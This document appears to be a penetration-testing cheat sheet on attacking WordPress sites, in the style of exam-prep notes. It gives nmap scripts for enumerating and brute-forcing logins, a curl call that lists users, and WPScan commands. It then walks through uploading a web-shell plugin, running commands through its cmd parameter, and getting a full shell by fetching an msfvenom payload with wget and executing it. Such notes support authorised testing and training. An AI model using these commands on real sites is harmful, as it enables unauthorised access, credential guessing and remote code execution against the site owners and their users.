WordPress
WordPress is a free and open-source content management system written in PHP and paired with a MySQL or MariaDB database. Features include a plugin architecture and a template system, referred to within WordPress as Themes.
-- Wikipedia
Related
Attacking WordPress | HackerTarget.com
nmap
nmap -p80 --script http-wordpress-enum --script-args check-latest=true,root=/wordpress -vvv <ip>
nmap -p80 --script http-wordpress-users --script-args basepath=/wp/,limit=100 -vvv <ip>
nmap -sV --script http-wordpress-brute --script-args uri=/wp/wp-login.php -vvv <ip>
(may take some time)
User enum
curl http://<host>/index.php/wp-json/wp/v2/users
WPScan
WordPress Security Scanner -> Register on wpscan.com to get an API token, to include checking of the "WordPress Vulnerability Database".
Enumerate (PWK2.0 style)
wpscan -e ap,at,cb,dbe -o wpscan -f cli-no-color --url <url>
Enumerate users
wpscan -e u -o wpscan_users -f cli-no-color --url <url>
Interesting files
Web Security Geeks - The Security Blog: Pentesting CMS : Wordpress Joomla Drupal
Default files: “readme.html”, “license.txt”
Configuration file location: [examplesitefortesting.com]/wp-config.php
Administrator login location: [examplesitefortesting.com]/wp-login.php
Plugin location: [examplesitefortesting.com]/wp-content/plugins
Install reverse shell plugin (authenticated)
/usr/share/seclists/Web-Shells/WordPress/plugin-shell.php
Zip the file
sudo zip plugin-shell.zip plugin-shell.php
Install the plugin Plugins -> Add New -> Upload Plugin -> Browse -> Install Now
execute command
curl <host>/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=<cmd>
Get a full shell
Generate payload using msfvenom
Upload via SimpleHTTPServer and wget (url encoding!)
chmod +x
Execute
Last updated